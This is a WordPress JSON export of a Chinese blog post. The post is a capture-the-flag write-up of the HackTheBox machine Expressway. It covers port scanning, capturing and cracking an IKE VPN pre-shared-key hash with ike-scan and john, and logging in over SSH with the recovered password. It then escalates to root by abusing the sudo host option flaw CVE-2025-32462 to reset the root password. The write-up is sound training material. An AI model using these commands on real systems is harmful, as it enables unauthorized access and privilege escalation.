{"id":330,"date":"2025-10-27T19:04:53","date_gmt":"2025-10-27T11:04:53","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=330"},"modified":"2026-01-29T16:18:59","modified_gmt":"2026-01-29T08:18:59","slug":"330","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/10\/27\/330\/","title":{"rendered":"HTB\u9776\u673a Expressway \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code><strong>10.10.11.87<\/strong><\/code><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">\u250c\u2500\u2500(root\u327fmisaka19008-PC)-[\/home\/\u2026\/Documents\/pentest_notes\/expressway\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.11.87\nPING 10.10.11.87 (10.10.11.87) 56(84) bytes of data.\n64 bytes from 10.10.11.87: icmp_seq=1 ttl=63 time=253 ms\n64 bytes from 10.10.11.87: icmp_seq=2 ttl=63 time=254 ms\n64 bytes from 10.10.11.87: icmp_seq=3 ttl=63 time=252 ms\n64 bytes from 10.10.11.87: icmp_seq=4 ttl=63 time=252 ms\n\n--- 10.10.11.87 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3006ms\nrtt min\/avg\/max\/mdev = 251.698\/252.557\/253.521\/0.646 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u8fde\u63a5\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sat Oct  4 12:30:23 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.10.11.87\nWarning: 10.10.11.87 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.87\nHost is up (0.25s latency).\nNot shown: 65534 closed tcp ports (reset)\nPORT   STATE         SERVICE\n22\/tcp open|filtered ssh\n\n# Nmap done at Sat Oct  4 12:31:05 2025 -- 1 IP address (1 host up) scanned in 41.89 seconds<\/code><\/pre>\n<p>\u53d1\u73b0\u9776\u673a\u9632\u706b\u5899\u5f00\u653e\u4e86<code>22\/tcp<\/code>\u7aef\u53e3\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sat Oct  4 12:34:14 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.10.11.87\nWarning: 10.10.11.87 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.87\nHost is up (0.23s latency).\nNot shown: 63948 closed tcp ports (conn-refused), 1586 filtered tcp ports (no-response)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.19\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   274.33 ms 10.10.14.1\n2   274.47 ms 10.10.11.87\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sat Oct  4 12:35:22 2025 -- 1 IP address (1 host up) scanned in 68.53 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sat Oct  4 12:36:02 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.10.11.87\nWarning: 10.10.11.87 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.87\nHost is up (0.31s latency).\nNot shown: 65291 open|filtered udp ports (no-response), 243 closed udp ports (port-unreach)\nPORT    STATE SERVICE\n500\/udp open  isakmp\n\n# Nmap done at Sat Oct  4 12:40:13 2025 -- 1 IP address (1 host up) scanned in 250.78 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sat Oct  4 12:44:05 2025 as: \/usr\/lib\/nmap\/nmap -sC -sU -sV -A -p500 -oN udp_result.txt 10.10.11.87\nNmap scan report for 10.10.11.87\nHost is up (0.34s latency).\n\nPORT    STATE SERVICE VERSION\n500\/udp open  isakmp?\n| ike-version: \n|   attributes: \n|     XAUTH\n|_    Dead Peer Detection v1.0\nToo many fingerprints match this host to give specific OS details\nNetwork Distance: 2 hops\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT       ADDRESS\n1   383.89 ms 10.10.14.1\n2   393.68 ms 10.10.11.87\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sat Oct  4 12:46:30 2025 -- 1 IP address (1 host up) scanned in 144.95 seconds<\/code><\/pre>\n<p>\u7ecf\u7f51\u7edc\u626b\u63cf\uff0c\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Debian Linux<\/code>\uff0c\u5f00\u653e\u4e86<code>22\/ssh<\/code>\u548c<code>500\/ikevpn<\/code>\u670d\u52a1\uff0c\u6839\u636e<code>HackTheBox<\/code>\u9776\u673a\u547d\u540d\u89c4\u5219\uff0c\u57df\u540d\u5e94\u4e3a<code>expressway.htb<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n<p>\u4f7f\u7528<code>root<\/code>\u7528\u6237\u8fde\u63a5<code>SSH<\/code>\u670d\u52a1\uff0c\u786e\u5b9a\u9776\u673a\u542f\u7528\u7684\u767b\u5f55\u65b9\u5f0f\uff1a<\/p>\n<pre><code class=\"language-plain\">ssh root@expressway.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761554463179-e73772f8-3cdf-4d61-94cd-c4ebdba07385.png\" alt=\"\" \/><\/p>\n<p>\u786e\u5b9a\u9776\u673a\u53ef\u4f7f\u7528\u5bc6\u94a5\u548c\u5bc6\u7801\u4e24\u79cd\u65b9\u6cd5\u767b\u5f55\u3002<\/p>\n<h2>IKE VPN\u670d\u52a1\uff08UDP500\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>ike-scan<\/code>\u5de5\u5177\uff0c\u5411\u9776\u673a<code>IKE VPN<\/code>\u670d\u52a1\u53d1\u9001<code>fakeID<\/code>\u63a2\u6d4b\u7ec4\u540d\u4ee5\u53ca\u6355\u83b7\u54c8\u5e0c\uff1a<\/p>\n<pre><code class=\"language-shell\">ike-scan -P -M -A -n fakeID 10.10.11.87<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761555159427-c43503c0-54b2-42c5-ac99-c5e1d09f7973.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u6355\u83b7\u8fd4\u56de\u54c8\u5e0c\u503c\uff01\u9664\u6b64\u4ee5\u5916\uff0c\u8fd8\u53d1\u73b0<code>IKE<\/code>\u670d\u52a1\u767b\u5f55\u7528\u6237\u540d\u4e3a<code>ike<\/code>\uff0c\u4e3b\u673a\u540d\u4e3a<code>expressway.htb<\/code>\uff0c\u9a8c\u8bc1\u65b9\u6cd5\u4e3a<code>PSK<\/code>\u9884\u5171\u4eab\u5bc6\u94a5\u3002<\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>\u7834\u89e3IKE VPN\u9884\u5171\u4eab\u5bc6\u94a5<\/h2>\n<p>\u5728\u670d\u52a1\u63a2\u6d4b\u9636\u6bb5\uff0c\u6211\u4eec\u5df2\u7ecf\u6210\u529f\u4f7f\u7528<code>ike-scan<\/code>\u5de5\u5177\u5411<code>IKE<\/code>\u670d\u52a1\u53d1\u9001<code>fakeID<\/code>\uff0c\u5e76\u6355\u83b7\u4e86<code>PSK<\/code>\u5bc6\u94a5\u54c8\u5e0c\uff0c\u4ee5\u53ca\u786e\u5b9a\u4e86\u767b\u5f55\u7528\u6237\u540d\uff0c\u73b0\u5728\u5c1d\u8bd5\u8fdb\u884c\u54c8\u5e0c\u7206\u7834\u3002<\/p>\n<p>\u9996\u5148\u5728<code>ike-scan<\/code>\u547d\u4ee4\u4e2d\u6dfb\u52a0<code>--pskcrack<\/code>\u53c2\u6570\uff0c\u5c06\u54c8\u5e0c\u4fdd\u5b58\u5230\u672c\u5730\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">ike-scan -P -M -A -n fakeID --pskcrack=ike_connhash.txt 10.10.11.87<\/code><\/pre>\n<p>\u968f\u540e\u4f7f\u7528<code>ikescan2john<\/code>\u5de5\u5177\u8ba1\u7b97\u53ef\u7834\u89e3\u54c8\u5e0c\u503c\uff0c\u63a5\u7740\u4f7f\u7528<code>john<\/code>\u5de5\u5177\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-shell\">ikescan2john .\/ike_connhash.txt &gt; ike_userhash.txt\njohn .\/ike_userhash.txt --wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761556030005-5eef53b6-3b3c-48b8-ae06-a07e3d08adce.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u53d6\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>ike<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>freakingrockstarontheroad<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u767b\u5f55<code>SSH<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">ssh ike@expressway.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761556153573-4975e2a6-70f2-4436-aaa7-e6c6b4440cba.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\u767b\u5f55SSH\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u76ee\u5f55\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u767b\u5f55\u7cfb\u7edf\u540e\uff0c\u6267\u884c<code>id<\/code>\u547d\u4ee4\uff0c\u53d1\u73b0\u7528\u6237<code>ike<\/code>\u5c5e\u4e8e\u7528\u6237\u7ec4<code>proxy<\/code>\u3002\u5c1d\u8bd5\u6267\u884c<code>sudo -l<\/code>\u547d\u4ee4\u67e5\u770b\u6743\u9650\uff0c\u53d1\u73b0\u5f53\u524d\u7528\u6237\u65e0\u6743\u4f7f\u7528<code>sudo<\/code>\uff0c\u9042\u5f00\u59cb\u8fdb\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\u3002<\/p>\n<p>\u5728<code>\/var\/log\/<\/code>\u76ee\u5f55\u4e0b\u53d1\u73b0\u540d\u4e3a<code>squid<\/code>\u7684\u5b50\u76ee\u5f55\uff0c\u5c5e\u4e3b\u4e3a<code>proxy<\/code>\u7528\u6237\u7ec4\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761560201721-a1cc4c3d-9937-487d-928e-0925d041e101.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u5217\u51fa\u76ee\u5f55\u5185\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">ls -lA \/var\/log\/squid\/<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761560258131-1c41394d-c546-46ef-84cf-7b3f429b3451.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u65e5\u5fd7\u6587\u4ef6<code>access.log.1<\/code>\uff0c\u6253\u5f00\u67e5\u770b\uff1a<\/p>\n<pre><code class=\"language-shell\">cat \/var\/log\/squid\/access.log.1<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761561579014-d620b00c-4b05-481f-9f7e-2c83f859aa7d.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u4e3a\u67d0\u4e2a<code>HTTP<\/code>\u670d\u52a1\u7684\u8bbf\u95ee\u65e5\u5fd7\uff0c\u5176\u4e2d\u5b58\u5728\u4e0b\u9762\u4e00\u884c\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-plain\">1753229688.902      0 192.168.68.50 TCP_DENIED\/403 3807 GET http:\/\/offramp.expressway.htb - HIER_NONE\/- text\/html<\/code><\/pre>\n<p>\u53d1\u73b0\u8bbf\u95ee\u65e5\u5fd7\u4e2d\u8bb0\u5f55\u4e86\u9776\u673a\u7684\u53e6\u4e00\u4e2a\u57df\u540d\uff1a<code>offramp.expressway.htb<\/code>\u3002<\/p>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u5176\u5b83\u4fe1\u606f\u3002<\/p>\n<h2>Sudo\u6f0f\u6d1e\u5229\u7528\u63d0\u6743<\/h2>\n<p>\u5728\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\u4e2d\uff0c\u9664\u53d1\u73b0\u4e00\u4e2a\u5b50\u57df\u540d<code>offramp<\/code>\u5916\uff0c\u672a\u53d1\u73b0\u5176\u5b83\u4fe1\u606f\uff0c\u9042\u5c1d\u8bd5\u5bfb\u627e\u64cd\u4f5c\u7cfb\u7edf\u6f0f\u6d1e\u63d0\u6743\u3002\u9996\u5148\u67e5\u770b<code>sudo<\/code>\u7248\u672c\uff1a<\/p>\n<pre><code class=\"language-shell\">sudo --version<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761561883748-46e6f472-bc1d-42dd-b7e2-0720c9752cdc.png\" alt=\"\" \/><\/p>\n<p>\u53ef\u77e5<code>sudo<\/code>\u7a0b\u5e8f\u7248\u672c\u4e3a<code>v1.9.17<\/code>\uff0c\u8054\u7f51\u67e5\u627e\u6f0f\u6d1e\uff1a<\/p>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52354\" target=\"_blank\"  rel=\"nofollow\" >Sudo 1.9.17 Host Option - Elevation of Privilege - Linux local Exploit<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761561953836-e64edbe2-7673-4bbe-bbc2-2c71f69aa663.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u7248\u672c<code>Sudo<\/code>\u7a0b\u5e8f\u5b58\u5728\u6743\u9650\u63d0\u5347\u6f0f\u6d1e\uff0c\u7f16\u53f7\u4e3a<code>CVE-2025-32462<\/code>\u3002\u5728\u4ee5\u5f80\u7684<code>Sudo<\/code>\u7248\u672c\u4e2d\uff0c\u5982\u679c<code>\/etc\/sudoers<\/code>\u6587\u4ef6\u5185\u5b58\u5728\u591a\u4e2a\u4e3b\u673a\u540d\u7684\u6743\u9650\u914d\u7f6e\uff0c\u5219\u7528\u6237\u53ea\u5141\u8bb8\u4f7f\u7528<code>-h<\/code>\u642d\u914d<code>-l<\/code>\u53c2\u6570\u67e5\u770b\u5176\u5b83\u4e3b\u673a\u540d\u7684\u914d\u7f6e\u4fe1\u606f\uff0c\u4f46\u5728\u5b58\u5728\u6f0f\u6d1e\u7684\u7248\u672c\u4e2d\uff0c\u7528\u6237\u53ef\u4ee5\u4f7f\u7528<code>-h<\/code>\u53c2\u6570\u4e8e\u5f53\u524d\u4e3b\u673a\u4e0a\u6267\u884c\u5176\u5b83\u4e3b\u673a\u540d\u4e0b\u7684\u6743\u9650\u914d\u7f6e\u3002<\/p>\n<p>\u8054\u60f3\u5230\u5728<code>\/var\/log\/squid\/access.log.1<\/code>\u65e5\u5fd7\u6587\u4ef6\u4e2d\u53d1\u73b0\u7684\u4e3b\u673a\u540d<code>offramp.expressway.htb<\/code>\uff0c\u731c\u6d4b\u7ba1\u7406\u5458\u5728<code>\/etc\/sudoers<\/code>\u6587\u4ef6\u5185\u914d\u7f6e\u4e86\u5c5e\u4e8e\u8be5\u4e3b\u673a\u540d\u7684\u4e00\u4e9b\u7279\u6b8a\u6743\u9650\uff0c\u5c1d\u8bd5\u67e5\u770b\uff1a<\/p>\n<pre><code class=\"language-shell\">sudo -h offramp.expressway.htb -l<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761562548616-a9a09d33-f021-4c26-967c-40a8587bed97.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u7528\u6237<code>ike<\/code>\u5728<code>offramp.expressway.htb<\/code>\u4e3b\u673a\u540d\u4e0b\u53ef\u4ee5<code>root<\/code>\u7528\u6237\u8eab\u4efd\u514d\u5bc6\u6267\u884c\u4efb\u4f55\u547d\u4ee4\u3002\u76f4\u63a5\u4fee\u6539<code>root<\/code>\u5bc6\u7801\uff0c\u968f\u540e\u5207\u6362\u7528\u6237\u5230<code>root<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">sudo -h offramp.expressway.htb passwd root\nsu -<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761562676180-83b07ea9-fff7-4a61-9c91-5e49158d1cd7.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.11.87 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b \u250c\u2500\u2500(root\u327fmisaka19008-PC)-[\/home &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[19,14],"tags":[],"class_list":["post-330","post","type-post","status-publish","format-standard","hentry","category-htb_season_9","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=330"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/330\/revisions"}],"predecessor-version":[{"id":331,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/330\/revisions\/331"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}